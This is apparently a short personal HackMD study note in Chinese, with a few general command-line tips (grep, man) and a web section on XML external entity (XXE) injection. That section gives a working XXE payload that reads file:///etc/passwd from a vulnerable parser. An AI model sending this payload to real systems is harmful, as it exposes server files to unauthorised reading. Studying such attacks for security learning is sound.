# 筆記酷 ## genernall skills ```cmd= grep -r "123" -找尋關鍵字 man 說明頁面 ???? 通往福(再研究) ``` ## web ### XML XXE 注入 放這東西攻擊可取得file:///etc/passwd的資料 ```html <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root>&xxe;</root> ```
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up